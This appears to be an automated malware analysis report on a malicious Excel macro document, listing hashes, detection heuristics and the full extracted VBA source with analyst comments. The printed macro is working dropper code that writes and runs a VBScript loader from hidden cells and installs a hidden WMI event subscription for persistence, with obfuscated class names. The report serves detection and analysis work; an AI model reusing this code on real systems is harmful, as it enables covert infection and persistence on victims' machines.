Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 29824741eb9e14a8…

MALICIOUS

Office (OLE)

152.5 KB Created: 2018-10-31 08:57:54 First seen: 2019-05-16
MD5: fff193eae10c56287ce050525da54dd5 SHA-1: ba74a3c05e5efe165e24fa7c2c6f185f33671142 SHA-256: 29824741eb9e14a8a38ec556832e2f9fc76928844fdeb11062097f08da2005df
496 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The Workbook_Open macro executes a Shell command to run a dynamically created VBScript file. This VBScript file then reads and executes content from a temporary file named 'DM6331.TMP', which is populated with obfuscated data from the spreadsheet. The script also attempts to write to the registry key HKLM\SOFTWARE\Microsoft\rknrl\wspr, likely for persistence or tracking. This indicates a downloader functionality, where the macro serves as the initial execution vector for a second-stage payload. Note that the extracted macro's wmiserv/WmiConsumer routines additionally register a WMI permanent event subscription in root\subscription (an ActiveScriptEventConsumer bound to an __IntervalTimerInstruction through a __FilterToConsumerBinding) whose embedded VBScript re-creates and re-launches the dropped files on a timer; this WMI subscription (Event Triggered Execution: WMI Event Subscription, T1546.003), rather than the registry value, is the persistence mechanism visible in the code, while the registry value only receives an "E<month>-<day>" stamp on first run.

Heuristics 12

  • ClamAV: Xls.Downloader.Generic-6923172-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Generic-6923172-0
  • VBA macros detected medium 9 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
      Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34)
    End Sub
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      txt = "On Error Resume Next:Dim Fso,WShell,objFile,Wmi:Set WShell = CreateObject(""WScript.Shell""):Set FSO = CreateObject(""Scripting.Filesystemobject""):Set Wmi=getobject(""winmgmts:\\.\root\cimv2""):dir = WShell.expandenvironmentstrings(""%temp%"") & ""\"":DMtxt = """
      txt = txt & DM & """:Set objFile = Fso.CreateTextFile(dir&""DM6331.TMP"",True,False):objFile.write DMtxt:objFile.close:VBStxt = """
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
      Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34)
    End Sub
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
      vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)"
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
      Const HKEY_LOCAL_MACHINE = &H80000002
      Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
      oReg.GetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", strValue
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Workbook_Open()
      On Error Resume Next
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
      Dim gPath As String, str As String
      gPath = Environ("TEMP")
      ChDrive "C"
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6478 bytes
SHA-256: 1e0c489e8d57642c80c72f80fff37fe6c3b9984a83e8837cb7ff9489c6719fed
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst notes: auto-executing entry point (OLE_VBA_WBOPEN finding above).
' Workbook_Open runs when the document is opened with macros enabled. Net
' effect of this routine: assemble a payload from hidden sheet cells, drop it
' and a loader VBScript into %TEMP%, hand both to wmiserv for WMI persistence,
' stamp a registry marker, then launch the loader with wscript.exe.
Private Sub Workbook_Open()
  ' Every runtime error is swallowed, so partial failures leave no trace.
  On Error Resume Next
  ' str is declared but never used in this routine.
  Dim gPath As String, str As String
  ' Drop directory is %TEMP%.
  gPath = Environ("TEMP")
  ChDrive "C"
  ChDir gPath
  ' Reassemble the second-stage text from 180 cells (z1..z180) of a sheet whose
  ' name is a single space. The cell contents are not part of this extraction,
  ' so what DM6331.TMP will actually execute cannot be seen here.
  For i = 1 To 180
    dmStr = dmStr & Sheets(" ").Range("z" & i).Text
  Next
  
  ' Payload text and loader script paths in %TEMP%.
  DMpath = gPath & "\DM6331.TMP"
  VBSpath = gPath & "\rknrl.vbs"
  
  ' Drop the reassembled cell data as DM6331.TMP.
  Open DMpath For Output As #1
  Print #1, dmStr
  Close #1
  
  ' Loader: a one-line VBScript that opens DM6331.TMP in its own folder
  ' (OpenTextFile mode 1 = read, no create), reads it whole and passes the
  ' text to Execute, so the cell data is run as VBScript.
  vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)"
  
  ' Drop the loader as rknrl.vbs.
  Open VBSpath For Output As #2
  Print #2, vbsStr
  Close #2
  
  ' Persistence: wmiserv (below) registers a WMI event subscription whose
  ' script re-drops and re-runs both files on a timer.
  wmiserv dmStr, vbsStr
  'Application.Wait (Now + TimeValue("0:00:02"))
  
  ' Infection marker: HKLM\SOFTWARE\Microsoft\rknrl\wspr is read through the
  ' StdRegProv WMI provider and, if empty, set to "E<month>-<day>", which looks
  ' like a first-run date stamp. The same check is repeated inside the WMI
  ' consumer script built by wmiserv. Writing under HKLM normally requires
  ' administrative rights; a failure here is hidden by On Error Resume Next.
  Const HKEY_LOCAL_MACHINE = &H80000002
  Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
  oReg.GetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", strValue

  If strValue = "" Then
    oReg.SetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", "E" & Month(Now()) & "-" & Day(Now())
  End If
  

  ' Initial execution: wscript.exe //B (batch mode, no error dialogs) runs the
  ' loader. This is the OLE_VBA_SHELL / OLE_VBA_LOLBIN hit listed above.
  Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34)
End Sub

' Analyst notes: builds the VBScript that the WMI consumer will execute and
' registers it via WmiConsumer. DM is the reassembled payload text and VBS the
' loader text, both as produced by Workbook_Open.
Function wmiserv(DM, VBS)
  On Error Resume Next
  Dim objConn As Object, nslink As String
  ' "winmgmts:\\.\root\subscription" assembled from fragments so the literal
  ' never appears whole (OLE_VBA_SPLIT_KEYWORD_OBFUSCATION finding above).
  nslink = "winmgm" & "ts:\\." & "\root\" & "subscr" & "iption"
  Set objConn = GetObject(nslink)
  
  ' Double every quote so both texts can be embedded as VBScript string literals.
  DM = Replace(DM, """", """""")
  VBS = Replace(VBS, """", """""")
  
  ' Consumer script (one colon-separated line). Each time the timer fires it:
  '   1. re-creates %temp%\DM6331.TMP from DM and %temp%\rknrl.vbs from VBS,
  '   2. runs "wscript.exe //B <temp>\rknrl.vbs" through WScript.Shell,
  '   3. repeats the HKLM\software\Microsoft\rknrl\wspr first-run stamp if empty.
  ' Deleting the dropped files therefore does not stop the infection; the
  ' subscription re-drops and re-launches them. The root\cimv2 connection
  ' stored in Wmi is opened but never used.
  txt = "On Error Resume Next:Dim Fso,WShell,objFile,Wmi:Set WShell = CreateObject(""WScript.Shell""):Set FSO = CreateObject(""Scripting.Filesystemobject""):Set Wmi=getobject(""winmgmts:\\.\root\cimv2""):dir = WShell.expandenvironmentstrings(""%temp%"") & ""\"":DMtxt = """
  txt = txt & DM & """:Set objFile = Fso.CreateTextFile(dir&""DM6331.TMP"",True,False):objFile.write DMtxt:objFile.close:VBStxt = """
  txt = txt & VBS & """:Set objFile = Fso.CreateTextFile(dir&""rknrl.vbs"",True,False):objFile.write VBStxt:objFile.close:WShell.run ""wscript.exe //B "" & Chr(34) & dir & ""rknrl.vbs"" & Chr(34):wspr = WShell.regread (""HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr""):if wspr = """" then:WShell.regwrite ""HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr"", ""E""&Month(now())&""-""&Day(now()), ""REG_SZ"":end if"

  ' Register the subscription under the name prefix "rknrl" (see WmiConsumer).
  WmiConsumer objConn, txt, "rknrl"

' Declared as Function but never assigns a return value.
End Function

' Analyst notes: creates a WMI permanent event subscription in the namespace
' objConn points at (root\subscription, per wmiserv). Four objects are written:
'   ActiveScriptEventConsumer  "<consumer>_consumer" - runs txt as VBScript
'   __IntervalTimerInstruction "rknrl_itimer"        - fires every runinterval ms
'   __EventFilter              "rknrl_filter"        - WQL on __TimerEvent for that timer
'   __FilterToConsumerBinding                        - ties the filter to the consumer
' The subscription lives in the WMI repository rather than in a file or Run
' key and persists across reboots; creating it normally requires administrative
' rights, and any failure is hidden by On Error Resume Next. For detection,
' enumerate these classes in root\subscription; the consumer script typically
' runs in the script-consumer host (scrcons.exe), so wscript.exe being spawned
' from it on a ~1.5 s cadence is the observable tell. WMI class names are
' split into concatenated fragments to avoid appearing as whole literals.
Function WmiConsumer(objConn, txt, consumer)
  On Error Resume Next
  dn = "rknrl"
  ' Interval in milliseconds: 1500 = 1.5 s between timer events.
  runinterval = 1500
  stxt = txt
  ' ActiveScriptEventConsumer: executes stxt with the vbscript engine.
  Set asec = objConn.Get("Active" & "Script" & "EventC" & "onsumer").spawninstance_
  asec.Name = consumer & "_consumer"
  asec.scriptingengine = "vbscript"
  asec.ScriptText = stxt
  Set asecpath = asec.put_
  ' __IntervalTimerInstruction: recurring timer that generates __TimerEvent.
  Set itimer = objConn.Get("__Inter" & "valTim" & "erInst" & "ruction").spawninstance_
  itimer.timerid = dn & "_itimer"
  itimer.intervalbetweenevents = runinterval
  itimer.skipifpassed = False
  itimer.put_
  ' __EventFilter: selects only this timer's events.
  Set evtflt = objConn.Get("__EventFilter").spawninstance_
  evtflt.Name = dn & "_filter"
  evtflt.Query = "select * from __timerevent where timerid=""" & dn & "_itimer"""
  evtflt.querylanguage = "wql"
  Set fltpath = evtflt.put_
  ' __FilterToConsumerBinding: filter -> consumer; this is what makes it run.
  Set fcbnd = objConn.Get("__Filter" & "ToConsumer" & "Binding").spawninstance_
  fcbnd.consumer = asecpath.Path
  fcbnd.Filter = fltpath.Path
  fcbnd.put_
End Function




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst notes: a second, simpler copy of the dropper, located in the Sheet4
' module. Workbook_Open is a ThisWorkbook event; in a sheet module this is just
' an ordinary procedure that nothing visible calls, so it is most likely a
' leftover development version of the routine in ThisWorkbook. Differences:
' 100 cells from a sheet named "test", loader text taken from cell a1, dropped
' as zz123.vbs, no registry marker, no WMI persistence, no On Error guard, and
' wscript.exe invoked without //B.
Private Sub Workbook_Open()
  Dim gPath As String, str As String
  gPath = Environ("TEMP")

  ' Reassemble payload text from cells z1..z100 of sheet "test".
  For i = 1 To 100
     str = str & Sheets("test").Range("z" & i).Text
  Next
  
  'str = "msgbox ""ssfff"""
  
  ' Same payload filename as the live routine.
  Open gPath & "\DM6331.TMP" For Output As #1
  Print #1, str
  Close #1
  
  ' Loader text comes from cell a1 here rather than a hard-coded string.
  Open gPath & "\zz123.vbs" For Output As #2
  Print #2, Sheets("test").Range("a1").Text
  Close #2
  
  
  
  ' Launch without //B, so script errors would show dialogs.
  Shell "wscript.exe " & """" & gPath & "\zz123.vbs" & """"
  

End Sub
' Analyst notes: test stub in the Sheet4 module. Takes no arguments and
' registers a WMI consumer whose script body is the literal "ttttt"; there is
' no On Error guard and nothing visible calls it. The live version with
' (DM, VBS) parameters is in ThisWorkbook.
Function wmiserv()
Dim objConn As Object, nslink As String
' Fragmented "winmgmts:\\.\root\subscription", as in the ThisWorkbook copy.
nslink = "winmgm" & "ts:\\." & "\root\" & "subscr" & "iption"
Set objConn = GetObject(nslink)
txt = "ttttt"
WmiConsumer objConn, txt, "rknrl"
End Function

' Analyst notes: Sheet4-module duplicate of the WmiConsumer in ThisWorkbook,
' reachable only from the stub wmiserv() above. Logic is identical (consumer,
' interval timer, event filter, binding in the namespace objConn points at);
' the only difference is runinterval = 10000, i.e. a 10 s timer instead of
' 1.5 s. See the ThisWorkbook copy for the per-object breakdown.
Function WmiConsumer(objConn, txt, consumer)
On Error Resume Next
dn = "rknrl"
' Interval in milliseconds: 10000 = 10 s between timer events.
runinterval = 10000
stxt = txt
Set asec = objConn.Get("Active" & "Script" & "EventC" & "onsumer").spawninstance_
asec.Name = consumer & "_consumer"
asec.scriptingengine = "vbscript"
asec.ScriptText = stxt
Set asecpath = asec.put_
Set itimer = objConn.Get("__Inter" & "valTim" & "erInst" & "ruction").spawninstance_
itimer.timerid = dn & "_itimer"
itimer.intervalbetweenevents = runinterval
itimer.skipifpassed = False
itimer.put_
Set evtflt = objConn.Get("__EventFilter").spawninstance_
evtflt.Name = dn & "_filter"
evtflt.Query = "select * from __timerevent where timerid=""" & dn & "_itimer"""
evtflt.querylanguage = "wql"
Set fltpath = evtflt.put_
Set fcbnd = objConn.Get("__Filter" & "ToConsumer" & "Binding").spawninstance_
fcbnd.consumer = asecpath.Path
fcbnd.Filter = fltpath.Path
fcbnd.put_
End Function